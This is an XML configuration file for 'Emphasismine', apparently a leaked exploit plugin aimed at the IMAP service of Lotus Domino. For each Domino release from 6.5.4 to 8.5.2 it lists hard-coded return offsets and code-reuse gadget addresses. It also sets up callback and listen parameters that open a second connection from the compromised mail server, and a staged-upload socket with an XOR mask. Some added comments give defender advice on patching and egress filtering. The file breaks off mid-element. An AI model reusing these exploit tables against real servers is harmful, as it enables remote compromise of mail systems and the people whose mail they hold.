shadowbrokers-exploits/windows/exploits/Emphasismine-3.4.0.0.xml
2017-04-14 11:45:07 +02:00


<?xml version="1.0" encoding="UTF-8"?>
<config xmlns="urn:trch"
id="0a9ec8318c0f544ba84f56df2e5e3c278844f5bf"
name="Emphasismine"
version="3.4.0"
configversion="3.4.0.0"
schemaversion="2.0.0">
<inputparameters>
<!-- Connection settings supplied by the operator. TargetPort defaults to 143, the standard IMAP port. -->
<parameter name="TargetIp" description="Target IP Address" type="IPv4"/>
<parameter name="TargetPort" description="Port used by the IMAP service" type="TcpPort">
<default>143</default>
</parameter>
<!-- A mailbox username and password are plain String inputs with no default value here. -->
<!-- NOTE(review): this suggests the plugin logs in to IMAP before doing anything else, which would make a valid account a precondition and authenticated IMAP sessions the place to look in server logs; confirm against the plugin binary, which is not part of this file. -->
<parameter name="TargetAcctUsr" type="String" description="Target account username"/>
<parameter name="TargetAcctPwd" type="String" description="Target account password"/>
<!-- All plugins that perform blocking network calls must have a NetworkTimeout parameter or its equivalent -->
<!-- Timeout is in seconds and defaults to 60; the description allows -1 to disable it, which fits the signed S16 type. -->
<parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16">
<default>60</default>
</parameter>
<!-- Version-dependent input parameters: the DominoVersion choice selects one paramgroup, and each paramgroup holds the values for that Lotus Domino release -->
<paramchoice name="DominoVersion" description="The version of Lotus Domino running on the target">
<paramgroup name="6.5.4" description="">
<!-- Values used when DominoVersion is 6.5.4. All twelve parameters are hidden="true" and carry a fixed value element rather than a default, so they are constants of this build and not operator input. -->
<!-- Defender note: the Addr* and RetEip entries are hard-coded 32-bit values, with one such table per Domino release listed in this paramchoice (6.5.4 through 8.5.2). -->
<!-- NOTE(review): they look like absolute addresses inside the server's modules, which would only stay valid where those modules load at a fixed base; confirm against the binaries. -->
<!-- The release list is the part that matters for asset inventory: hosts running a listed release with IMAP reachable are the ones to prioritise for vendor updates or for removing IMAP from untrusted networks. -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x34C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x00428463</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0042E038</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x00420CF5</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x60132252</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60951039</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x607112B4</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x60168187</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x600A371D</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x609DBEA1</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x0042845E</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041331B</value>
</parameter>
</paramgroup>
<paramgroup name="6.5.5" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x34C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x004283D3</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0042E038</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x00420C15</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x00427989</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60984BC9</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60740B94</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x60169917</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x6016B89E</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x60A0FCB1</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004283CE</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041323B</value>
</parameter>
</paramgroup>
<paramgroup name="6.5.5FP1" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x34C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x004283D3</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0042E038</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x00420C15</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x00427989</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60985499</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60741404</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6099F0D7</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x6003620D</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x60A108A1</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004283CE</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041323B</value>
</parameter>
</paramgroup>
<paramgroup name="7.0" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a001</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d5a7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042cbec</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100aa91d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x606f6ee4</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600fa694</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429a6c</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050A7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050AF</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413E78</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.1" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042Af00</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041D5A7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042CBEC</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100AA91D</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x606F9364</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600FA6D4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429A6C</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050A7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050AF</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413E78</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.2" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042A001</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041D5A7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042CB58</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100AAADD</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60709A24</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600F8E54</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429A6C</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050A7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x6001FAC1</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413E78</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.3" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042A091</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041D637</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042CBE8</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100AA9ED</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x6071E614</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600F87E4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429AFC</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050B7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050BF</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413F08</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.3FP1" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042A091</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041D637</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042CBE8</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100AA9ED</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x6071e674</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600f8824</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429AFC</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050B7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050BF</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413F08</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.4" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042A271</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d817</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042cdde</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100a9e3d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60728db4</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x60150da4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429cdc</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x00405107</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x0040510f</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413f98</value>
</parameter>
</paramgroup>
<paramgroup name="8.0" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x00429fa1</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043205c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d567</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042caf8</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60aa7dab</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60764914</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x60153b14</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429a12</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x00405067</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x0040506f</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413cd8</value>
</parameter>
</paramgroup>
<paramgroup name="8.0.1" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a001</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043205c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d5c7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042cb58</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60abf84b</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60772714</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x601549d4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429a72</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050b7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050bf</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413d38</value>
</parameter>
</paramgroup>
<paramgroup name="8.0.2" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a001</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043205c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d5c7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042cb58</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60Ace7ab</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x6077a774</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600f9b04</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429a72</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050b7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050bf</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413d38</value>
</parameter>
</paramgroup>
<paramgroup name="8.5" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a361</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0042d17a</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042ceb8</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60b8de5b</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x606068f8</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600f37c4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429dd4</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050b7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050bf</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00414068</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042b5d0</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041db67</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d4a0</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60630e48</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015db64</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x42a146</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x4050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x4050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x4140c8</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP1" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a831</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0042e761</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d388</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x606311b8</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015dbd4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a2a6</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041413c</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP2" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a831</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0042e761</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d388</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60631f08</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015d2d4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a2a6</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041413c</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP3" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a831</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0042e761</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d388</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60631058</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015c0c4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a2a6</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041413c</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP4" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a7d1</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041dc67</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d328</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60631328</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015c284</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a240</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x004140dc</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP5" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a7d1</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041dc67</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d328</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60631a78</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015c654</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a240</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x004140dc</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.2" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042AA81</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041DF07</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042D66C</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60DDE56B</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60692948</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6014a394</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042A4F2</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x00405227</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x0040522F</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x004142AC</value>
</parameter>
</paramgroup>
</paramchoice>
<!-- All plugins that accept a callback must have the Callback* parameters listed below, or their equivalents. -->
<!-- Callback/Callin parameters -->
<!-- Direction chooses how the second TCP connection is made once the plugin has run; Callback is the default. -->
<!-- Defender note: both modes add a connection besides the IMAP session itself. In Callback mode the mail server connects out to CallbackIp:CallbackPort; in Callin mode something on the mail server listens on ListenPort. Egress filtering on mail servers and alerting on unexpected new listeners cover the two cases. -->
<paramchoice name="Direction" description="Callback from target or Callin to target">
<default>Callback</default>
<paramgroup name="Callback" description="Target calls back to plugin">
<parameter name="CallbackIp" description="Callback IP address" type="IPv4"/>
<!-- Default of 0 is kept as given; NOTE(review): whether 0 means "choose a port" is not stated in this file. -->
<parameter name="CallbackPort" description="Callback port" type="TcpPort" >
<default>0</default>
</parameter>
<!-- Optional (required="false"); used as the destination port of the remote tunnel in the redirection section. -->
<parameter name="CallbackLocalPort" description="Local callback port" type="TcpPort" required="false"/>
</paramgroup>
<paramgroup name="Callin" description="Target waits for call from plugin">
<parameter name="ListenPort" description="Port the egg will listen on" type="TcpPort"/>
<!-- Optional (required ="false"); used as the listen port of the second local tunnel in the redirection section. -->
<parameter name="ListenLocalPort" description="Port we connect to" type="TcpPort" required ="false"/>
<!-- Wait before connecting in, default 10; the unit is not stated here (NetworkTimeout above is in seconds, presumably the same). -->
<parameter name="ListenWait" description="Timeout to wait before trying to connect in." type="S16">
<default>10</default>
</parameter>
</paramgroup>
</paramchoice>
</inputparameters>
<outputparameters>
<!-- What the plugin hands to the next stage: the Contract is fixed to StagedUpload, and its group exposes an already connected TCP socket plus a one-byte mask. -->
<paramchoice name="Contract"
description="The contract fulfilled by this plugin">
<value>StagedUpload</value>
<paramgroup name="StagedUpload" description="">
<parameter name="ConnectedTcp"
description="The connected socket"
type="Socket"/>
<!-- NOTE(review): the name and U8 type suggest data sent over ConnectedTcp is XORed with a single byte; confirm against the consumer of this contract. If so, the bytes on the wire differ per mask value, so network detection should not depend on a fixed cleartext payload signature. -->
<parameter name="XorMask"
